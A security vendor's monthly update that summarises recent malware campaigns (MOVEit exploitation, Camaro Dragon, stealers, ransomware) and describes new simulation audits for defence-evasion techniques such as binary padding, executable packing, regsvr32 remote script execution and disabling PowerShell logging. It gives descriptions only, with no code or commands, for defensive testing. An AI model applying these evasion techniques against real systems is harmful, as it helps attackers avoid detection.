Threat Simulator: June 2023 Update

Threat Simulator: June 2023 Update

Whatever sector you operate in, you will need to ensure that you can stay safe from the latest cyber-attacks. Our expert team at Keysight's ATI (Application and Threat Intelligence) Research Center is constantly on the lookout for new threats, enabling us to create simulations of these threats within hours of their discovery.

These simulations are carefully crafted to replicate real-world scenarios, allowing you to test your controls manually or automatically. By doing so, you can ensure that your security posture is up to par and well-prepared to face potential threats, armed with identifiable Indicators of Compromise (IOC).

Our solution also empowers you to filter and prioritize threats based on your specific regional and industry preferences.

For instance, we assist our healthcare customers in staying one step ahead of cybercriminals. This month, we feature threats from Camaro Dragon, a China-based espionage threat actor who recently made headlines as the cause of a cybersecurity incident at a European hospital, attributed to the powerful malware named WispRider. Although it originated in Southeast Asia, infections have already been detected in various regions worldwide.

For more information on how we help our healthcare customers, check out our ebook.

Read on to learn how we can assist you, regardless of your vertical.

New Threat Campaigns:

Tracking Traces of Malware Disguised as Hancom Office Document File and Being Distributed (RedEyes)

AhnLab Security Emergency response Center has discovered a new malware disguised as Hancom Office files.

The malware comes in an archived form and contains an executable masquerading an Hancom Office document by mimicking its default file icon.

Once executed, it acquires persistence on the target machine and uses existing benign processes to communicate with a C2 server.

A webshell is employed in the communication and shares similarities in attacks managed by AP37/Red Eyes threat actors.

Malware Spotlight: Camaro Dragon's TinyNote Backdoor

Check Point Research has uncovered a novel Go-based backdoor called TinyNote, created by the Camaro Dragon a Chinese threat group, by accessing and investigating weakly secured distribution servers used by the attackers.

The malware is used in the first stage of an attack and can enumerate machines and execute remote command via PowerShell or Go.

A unique feature found in the sample is the possibility of the backdoor to bypass SmadAV, an antivirus product popular in South-East Asia.

The attribution of TinyNote with Camaro Dragon is due to similar naming convection found in another known backdoor called MQsTTang.

Kimsuky Strikes Again | New Social Engineering Campaign Aims to Steal Credentials and Gather Strategic Intelligence

SentinelOne discovered a social engineering campaign conducted by the Kimsuky threat actor against experts in North Korean affairs.

The aim of the campaign is to steal email credentials, distribute reconnaissance malware, and obtain NK News subscription credentials.

The threat actor is using impersonation tactics and malicious websites to deceive targets.

CVE-2023-34362: MOVEit Transfer SQL Injection Vulnerability Threat Brief

Unit42 alerted customers about a critical SQL injection vulnerability (CVE-2023-34362) in MOVEit Transfer product.

MOVEit Transfer is an application used to manage file transfers with the aim of enabling secure collaboration and automated transfers of sensitive data.

This vulnerability was exploited by threat actors, who were using it to upload a web shell in order to gain unauthorized access to the server.

Investigations are ongoing, and it is advised to apply mitigation measures.

ASEC Weekly Malware Statistics (May 22nd, 2023 - May 28th, 2023)

AhnLab released a weekly malware statistics report for May 22nd, 2023 - May 28th, 2023.

In the collected data, infostealer was first with 52.5%, downloader second with 38.1%, followed by backdoor with 6.4%, ransomware with 2.5% and coinminer with 0.4%.

The top 5 malware identified were: Amadey, AgentTesla, Formbook, Lokibot and SnakeKeylogger.

Facebook clickbait leads to money scam for users

Malwarebytes released a report on a new scam observed on Facebook, where users are tricked into clicking on posts leading to fake browser alerts, aiming to scam them for money.

The threat actor made this campaign unique by exploiting Google Cloud Run to create new malicious links frequently.

The scheme starts with certain Facebook accounts posting various types of content, including clickbait articles and newsworthy stories. The websites linked in these posts utilize a technique called cloaking, which deceives security controls.

Malware Being Distributed Disguised as a Job Application Letter

AhnLab released a report that uncovers a persistent distribution of malware that masquerades as a job application letter.

This malicious software is being spread through deceptive URLs designed to mimic a popular Korean job-seeking website.

The malware is equipped with a functionality that scans for antivirus processes, including AhnLab's V3Lite.exe, and carries out various harmful actions such as stealing sensitive information and recording keystrokes.

STEALTH SOLDIER BACKDOOR USED IN TARGETED ESPIONAGE ATTACKS IN NORTH AFRICA

Check Point Research identified a series of targeted espionage attacks in Libya, involving a new custom backdoor called Stealth Soldier.

The malware functions as a surveillance tool, enabling activities like file exfiltration, microphone recording and keylogging.

It was observed that this threat campaign shares infrastructure similarities with a previous campaign called "Eye on the Nile."

About PowerHarbor, a new malware used by SteelClover

NTT Security released a report regarding a new type of malware called PowerHarbor, which has been observed since the end of May 2023.

The threat actor behind PowerHarbor, SteelClover, designed one of the modules of the malware in order to steal credentials from web browsers.

ASEC Weekly Phishing Email Threat Trends (May 28th, 2023 - June 3rd, 2023)

AhnLab Security Emergency response Center (ASEC) has published a report on phishing email threats that occurred from May 28th, 2023 to June 3rd, 2023.

That week, the phishing emails were mostly disguised as a certain transport company with the Korean title: "UPS Korea-att invoice content".

The report highlights that FakePage is the most common threat type, with 36%, followed by Infostealers (27%), Trojan (22%), Downloader (10%), Exploit (2%), Worm (1%), Backdoor (1%) and Dropper (1%).

Sneaky DoubleFinger loads GreetingGhoul targeting your cryptocurrency

Securelist released a report regarding a new cryptocurrency theft method using a sophisticated loader called DoubleFinger and a stealer called GreetingGhoul.

DoubleFinger uses multiple stages to infect victims, while GreetingGhoul steals cryptocurrency-related credentials.

The campaign's origin may be from the post-Soviet space, and victims have been found in Europe, the USA, and Latin America.

Lazarus Threat Group Exploiting Vulnerability of Korean Finance Security Solution

AhnLab released a report about Lazarus threat group, which has been exploiting vulnerabilities in software such as INISAFE CrossWeb EX, MagicLine4NX, VestCert, and TCO!Stream.

This threat actor is targeting Korean companies and uses methods like watering hole attacks and third-party library execution vulnerabilities.

Through these methods, they download and execute malware, as well as propagate it internally.

ASEC Weekly Malware Statistics (June 5th, 2023 - June 11th, 2023)

AhnLab released a weekly malware statistics report for June 5th, 2023 - June 11th, 2023.

In the collected data, infostealers was first with 44.6%, downloaders second with 43.9%, followed by backdoor with 9.5% and ransomware with 2%.

The top 5 malware identified were: Amadey, AgentTesla, Guloader, Lokibot and Formbook.

Shampoo: A New ChromeLoader Campaign

HP Wolf Security released a report about a new ChromeLoader Campaign, called Shampoo, which installs malicious advertising extensions in Google Chrome.

The malware employs a complex infection chain, where victims unknowingly download and execute malicious VBScript files.

Once installed, the extension collects personal information, redirects searches, and injects unwanted ads.

#StopRansomware: CL0P Ransomware Gang Exploits CVE-2023-34362 MOVEit Vulnerability

As part of #StopRansomware effort, CISA released a report covering 'CLOP Ransomware' and published information related to used TTPs and IOCs.

CL0P ransomware gang has recently exploited an SQL injection vulnerability in Progress Software's managed file transfer (MFT) solution called MOVEit Transfer.

In recent campaigns, CL0P ransomware has focused more on data exfiltration rather than encryption. CL0P ransomware gang, also knows as TA505, has used zero-day exploits to install web shells on vulnerable servers, allowing them to execute commands and steal data.

The threat-actor has also targeted the GoAnywhere MFT platform and exfiltrated data from approximately 130 victims.

Tracking Diicot: an emerging Romanian threat actor

Cado released an article about an emerging threat actor, called Diicot, known for cryptojacking campaigns and developing malware as a service.

The group uses self-propagating tools, custom packers for obfuscation, cryptojacking, internet scanning for vulnerable systems, doxxing, and a botnet agent named Cayosin for DDoS attacks.

They were also involved in a feud with another hacking group, exposing personal details through doxxing.

The report focuses on Diicot's latest campaign and their self-propagating SSH brute-forcer.

Shuckworm: Inside Russia's Relentless Cyber Campaign Against Ukraine

Symantec released a report about a Russian linked cyber attack group, called Shuckworm, that has been targeting Ukraine since 2014.

The aim of the campaign is to gain military, security and government intelligence to support invading forces.

Shuckworm uses phishing emails with malicious attachments to gain access to victim machines and steals sensitive information such as military reports. They constantly update their tools and infrastructure, including USB propagation malware.

Threat Source Newsletter (June 15, 2023) - URLs have always been a great hiding place for threat actors

Talos released its new weekly Threat Source Newsletter (June 15, 2023) including the most prevalent malware observed over the past week.

It was reported that the recent Patch Tuesday from Microsoft brought relief as there were no new zero-day vulnerabilities. However, it is crucial to address the multiple critical vulnerabilities, rated with a severity score of 9.8 out of 10, disclosed by Microsoft, which require immediate patching to mitigate potential risks.

The top headlines of the week include Progress Software releasing patches for security vulnerabilities in its MOVEit file transfer software, high-profile American investors considering purchasing assets from NSO Group, and America's top cybersecurity official warning of potential cyber attacks from Chinese state-sponsored actors targeting critical infrastructure.

New Malware Campaign Targets LetsVPN Users

Cyble Research and Intelligence Labs has discovered a phishing campaign in which attackers impersonated the LetsVPN provider and tricked users to download malicious payloads.

Once the fake installer is executed, 3 payloads may be loaded on the victim's computer: BlackMoon (banking trojan), Farfli (backdoor) and a potentially unwanted application called KingSoft.

Among the observed effects that this attack may create are: keylogging, banking credential theft by tampering with the web browser and remote access.

Ransomware Roundup - Big Head

On 2023-06-16, Fortinet Threat Intelligence, FortiGuard, released a bi-weekly roundup of its ransomware dataset.

This report covers variants of Ransomware Roundup - Big Head ransomware.

Barracuda ESG Zero-Day Vulnerability (CVE-2023-2868) Exploited Globally by Aggressive and Skilled Actor, Suspected Links to China

Mandiant released a report regarding the exploitation of a vulnerability (CVE-2023-2868) in the Barracuda Email Security Gateway (ESG), by a Chinese threat actor identified as UNC4841 in order to start espionage campaigns against various targets.

The threat actor sends emails with specifically crafted attachments which trigger in the Barracuda ESG a remote code execution due to incorrect file parsing. Usually, the command injected and executed was to download further malicious components which gain persistence and allow more features for the attacker.

Regarding backdoors, the attacker utilizes SEASPY, SALTWATER and SEASIDE to collect data about the victim's machine and the network it resides in.

A rootkit disguised as a Linux kernel module (SANDBAR) is also present to hide the previously stated backdoors.

In additions, other helper modules (SEASPRAY and SKIPJACK written in Lua) and WHIRLPOOL (written in C) further increase the features that the attacker might utilize.

RecordBreaker Infostealer Disguised as a .NET Installer

AhnLab published a report regarding a new campaign that uses malicious downloaders added to archives containing benign files (usually cracked software), in order to download RecordBreaker Infostealer.

The downloader, written in Rust, can change its behavior based on the nature of the existing environment. If it discovers that it is inside a sandbox no malware download takes place.

The malicious behavior triggers in genuine environments and the download and injection of RecordBreaker Infostealer is accomplished.

Mystic Stealer: The New Kid on the Block

InQuest along with Zscaler ThreatLabz released a report regarding Mystic Stealer, an emerging malware capable of exfiltrating session cookies, credentials (such as Steam and Telegram) and cryptocurrency wallets.

The stealer is built not only to be on par with other existing stealers regarding the quality and quantity of the information stolen but to also evade analysis and defense mechanisms.

The unique features brought by this malware would be its use of a custom-made encrypted protocol to communicate with the C2 server and its ability to terminate itself if its starting execution date is older than an expiration date embedded in it.

The malware was advertised on some forums and a control panel, used by the attackers to manage their campaigns, can be also purchased along the stealer itself.

Inside of the WASP's nest: deep dive into PyPI-hosted malware

VirusTotal presents a report about malicious Python packages, mostly made for information stealing, uploaded on the PyPI repository and used for supply chain attacks.

Threat actors create Python libraries with similar names as genuine ones, relying on typos made by the developers when installing such packets. Usually, attackers modify popular modules and add malicious components or upload entire undisguised malware.

Discovered features in these samples include stealing credentials, browser cookies, cryptocurrency wallets and environment variables.

Regarding the malicious samples, the wide majority represent open-source projects, slightly modified when uploaded to PyPI.

RedEyes Group Wiretapping Individuals (APT37)

AhnLab discovered a new information stealer developed by the RedEyes threat group, capable of wiretapping and communication with the attacker through Ably platform.

The initial access is represented by a CHM (Compiled HTML Help File) file which contains the malware sample. Victim computers might receive this file through spear phishing email campaigns.

Once the CHM file is open, it downloads a PowerShell script which gains persistence on the target machine. Later attacks utilize a Go-based backdoor capable of transferring data in real-time through Ably platform. Communication with this platform is possible through an API key stored on a GitHub repository.

Exfiltrated data consists of screenshots, keystrokes and information from removable media devices.

Analysis of Ransomware With BAT File Extension Attacking MS-SQL Servers (Mallox)

AhnLab reported the evolved usage of BAT file to store and deliver Mallox ransomware and Remcos RAT in poorly managed MS-SQL servers.

The attacker makes use of PowerShell and sqlps module to execute the BAT File containing the two previously mentioned malware samples.

Mallox is injected into a benign process through a method known as process hollowing and starts blocking recovery methods for targeted files. Furthermore, it initiates brute force and dictionary attacks on the user credentials associated with the MS-SQL database instance.

Unpacking RDStealer: An Exfiltration Malware Targeting RDP Workloads

Bitdefender Labs published a report regarding the use of RDStealer and Logutil backdoor in compromising client machines which connect to a previously infected server through Remote Desktop Protocol (RDP).

These custom-made malware programs, written in Go, have been used in espionage operations in East Asia and are capable of credential theft and data exfiltration.

The attack is possible if the server was previously compromised with the RDStealer, which monitors incoming client connects and spreads the Logutil backdoor to clients which have the Client Drive Mapping (CDM) option enabled.

Logutil is then able to gain persistence in the client machine and exfiltrate files, clipboard content and browser history.

PindOS: New JavaScript Dropper Delivering Bumblebee and IcedID

Deep Instinct Threat Research Lab presented an upgraded malware dropper, PindOS, which shifted from using PowerShell to JavaScript in order to deliver two other malware, Bumblebee and IcedID.

PindOS dropper benefits from multiple URLs from which it can download the previously mentioned malware, method used to increase its chances of infection. Payloads downloaded are being enriched with pseudo-random generated contents in order to bypass detection, however with limited success.

Bumblebee is found as a DLL with anti-debugging and anti-sandboxing features.

IcedID represents an information stealer, specialized in finding and retrieving banking credentials. Recently, however, the program has shifted its focus to be more of a loader malware, capable of delivering various other malicious applications.

Graphican: Flea Uses New Backdoor in Attacks Targeting Foreign Ministries

Symantec uncovered a new backdoor, called Graphican, used by the Flea threat actor to target embassies in the Americas.

The backdoor uses Microsoft Graph API and OneDrive to get an encrypted C2 server URL for data exfiltration and communication. The encrypted URL is decrypted locally by the backdoor.

Once infected, the victim computer is vulnerable to remote PowerShell command issued by the C2 server.

In addition, the threat actor uses an extensive set of tools for credential dumping such as Mimikatz, Lazagne and CVE-2020-1472 privilege escalation vulnerability.

Ransomware Redefined: RedEnergy Stealer-as-a-Ransomware attacks

Zscaler ThreatLabz has uncovered a complex campaign which uses fake company webpages in order to deliver Red Energy Stealer, a malicious hybrid between an information stealer and a ransomware.

The malware is disguised as a browser update delivered through malicious webpages of various organizations which were advertised on LinkedIn.

Red Energy Stealer is responsible for browser information theft, deleting Windows backups and encrypting files found on the affected system.

Beyond the Horizon: Traveling the World on Camaro Dragon's USB Flash Drives

Check Point Response Team disclosed an incident in which a European hospital was infected with spyware delivered by the Camaro Dragon threat group through USB drives, more specifically WispRider payload and HopperTick launcher.

HopperTick, rewritten from Delphi to C++, is responsible of hiding all files from the USB drive and displaying only itself with a USB drive icon. Once executed it uses DLL-side-loading technique to evade detection. It also checks for other pluggable devices that can be infected.

WispRider, a DLL delivered by HopperTick, is responsible with communicating with the C2 server and writing itself to other pluggable devices found by the HopperTick.

IoT devices and Linux-based systems targeted by OpenSSH trojan campaign

Microsoft has issued a paper discussing a new cryptojacking method that uses a patched version of OpenSSH to download malware and infect additional hosts known to the victim.

The attack vector starts with a brute force on a misconfigured internet-facing Linux machine or an IoT device.

This compromised version of OpenSSH is bundled with malicious scripts that makes it compatible with multiple architectures and compiles the backdoor. It checks whether the system infected is a honeypot, and if it is not, it collects various system configuration information and passwords.

The obfuscation is provided by Diamorphine and Reptile rootkits that communicate through a component based on ZiggyStarTux IRC bot connected to the C2 server.

Trojanized Super Mario Game Installer Spreads SupremeBot Malware

Cyble Research and Intelligence Labs has discovered a trojanized game installer which delivers XMR Miner, SupremeBot and Umbral Stealer.

The game installer has a benign component that installs the Super Mario game while dropping previously mentioned malware.

XMR Miner is responsible to mine Monero crypto currency.

SupremeBot manages the miner's network communication and receives work tasks.

Lastly, Umbral Stealer, an open-source information stealer written in C#, is capable of gathering screenshots, webcam images, as well as browser passwords and cookies.

New Fast-Developing ThirdEye Infostealer Pries Open System Information

Fortinet discovered a new information stealer called ThirdEye, disguised as a document file, capable of exfiltrating data such as BIOS and hardware information (including virtualized environments), network ports used, processes and file system layout.

The malware author disguised the stealer by adding to the name of the executable file extensions common to Excel or PDF formats.

Gathered information is sent to the C2 server in plain text. However, some improved samples try to encode data in hexadecimal format.

Following NoName057(16) DDoSia Project's Targets

Sekoia.io analysists released a report regarding a new DDOS campaign linked to NoName057(16), a Russian affiliated hacktivist group.

Volunteers for this project are required to sign in via a Telegram channel from which they receive a user ID and an archive containing the DDOS tool, compatible with Windows, Linux and MacOS.

The tool was initially written in Python but now it was reworked using Go. Every malicious participant installs this tool which communicates with the C2 server and receives incoming target URLs which are then flooded with network requests.

New audits

Binary Padding Obfuscation: Change the hash of the file with junk padding (1 byte); Technique T1027.001; Tactic TA0005 Defence Evasion;

Adversaries may attempt to make an executable or file difficult to analyze by encrypting, encoding, or obfuscating its contents on the system or in transit. Binary padding is a technique used by attackers to change the on-disk representation of a file, by modifying its hash, without altering its functionality. This makes hash-based security controls ineffective.

This audit appends one junk byte (randomly generated) to a file, changing its checksum.

Binary Padding Obfuscation: Change the hash of the file with null byte padding (1 byte - Python); Technique T1027.001; Tactic TA0005 Defence Evasion;

Adversaries may attempt to make an executable or file difficult to analyze by encrypting, encoding, or obfuscating its contents on the system or in transit. Binary padding is a technique used by attackers to change the on-disk representation of a file, by modifying its hash, without altering its functionality. This makes hash-based security controls ineffective.

This audit performs zero padding, also known as null byte padding, by appending one zero byte to a file, changing its checksum.

Binary Padding Obfuscation: Change the hash of the file with junk padding (1000 bytes); Technique T1027.001; Tactic TA0005 Defence Evasion;

Adversaries may attempt to make an executable or file difficult to analyze by encrypting, encoding, or obfuscating its contents on the system or in transit. Binary padding is a technique used by attackers to change the on-disk representation of a file, by modifying its hash, without altering its functionality. This makes hash-based security controls ineffective.

This audit appends 1000 junk bytes (randomly generated) to a file, changing its checksum.

Binary Padding Obfuscation: Change the hash of the file with zero padding (1000 bytes); Technique T1027.001; Tactic TA0005 Defence Evasion;

Adversaries may attempt to make an executable or file difficult to analyze by encrypting, encoding, or obfuscating its contents on the system or in transit. Binary padding is a technique used by attackers to change the on-disk representation of a file, by modifying its hash, without altering its functionality. This makes hash-based security controls ineffective.

This audit appends 1000 zero bytes to a file, changing its checksum.

Software Packing Obfuscation - 'UPX': Packed Executable; Technique T1027.002; Tactic TA0005 Defence Evasion;

In order to protect their malicious code, adversaries may opt for software packing. This method of obfuscation successfully compresses and/or encrypts an executable, changing its signature and thus evading signature-based detection.

UPX is an open-source packer (https://upx.github.io/) for executable files that supports multiple executable formats.

This audit deploys a UPX-packed executable file on the system-under-test, runs it and writes the output to a file. This packed executable is writing dummy data to the standard output.

Software Packing Obfuscation - 'NSIS': Packed Executable; Technique T1027.002; Tactic TA0005 Defence Evasion;

In order to protect their malicious code, adversaries may opt for software packing. This method of obfuscation successfully compresses and/or encrypts an executable, changing its signature and thus evading signature-based detection.

NSIS (Nullsoft Scriptable Install System) is an open source project (https://sourceforge.net/projects/nsis/) under zlib license, that can be used for creating Windows installers. It is script-based and therefore allows a user to define their own installation logic and tasks.

This audit uses a NSIS template to create a NSIS script based on the input arguments provided. It uses NSIS to pack an executable inside a Windows installer. At runtime, the installer drops the executable in the specified location and runs it.

Regsvr32 - 'regsvr32.exe': Execute remote SCT file (Command Prompt); Technique T1218.010; Tactic TA0005 Defence Evasion;

Regsvr32.exe is a command-line program used to register and unregister OLE controls, such as DLLs and ActiveX controls in the Windows Registry.

Adversaries may abuse regsvr32.exe to execute a remote .SCT script with scrobj.dll that will create a new file in the TEMP folder. The .SCT file contains a JScript script.

Regsvr32 - 'regsvr32.exe': Execute SCT file (Command Prompt); Technique T1218.010; Tactic TA0005 Defence Evasion;

Regsvr32.exe is a command-line program used to register and unregister OLE controls, such as DLLs and ActiveX controls in the Windows Registry.

Adversaries may abuse regsvr32.exe to execute a local .SCT script with scrobj.dll that will create a new file in the TEMP folder. The .SCT file contains a JScript script.

Regsvr32 - 'regsvr32.exe': Execute DLL file (Command Prompt); Technique T1218.010; Tactic TA0005 Defence Evasion;

Regsvr32.exe is a command-line program used to register and unregister OLE controls, such as DLLs and ActiveX controls in the Windows Registry.

Adversaries may abuse regsvr32.exe to execute an arbitrary DLL that will create a new file in the TEMP folder.

Disable or Modify System Firewall - PsExec and logman: Stop PowerShell script b lock logging (Command Prompt); Technique T1562.006; Tactic TA0005 Defence Evasion;

An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed.

This could include maliciously redirecting or even disabling host-based sensors, such as Event Tracing for Windows (ETW), by changing settings that control the collection and flow of event telemetry.

Audit disables the ETW provider Microsoft-Windows-PowerShell/Operational in order to not alert, through the ScriptBlock logging, any suspicious powershell cmdlets found here[1].

[1] : https://github.com/PowerShell/PowerShell/blob/79f21b41de0de9b2f68a19ba1fdef0b98f3fb1cb/src/System.Management.Automation/engine/runtime/CompiledScriptBlock.cs#L1546-L1829

To find out more information on how Keysight can help you rapidly find, remediate, and validate exploitable security vulnerabilities before they become headline news check out our website.

To sign up our MSSP program visit here.

Public link

Please use the above public link if you want to share this noodl on another website.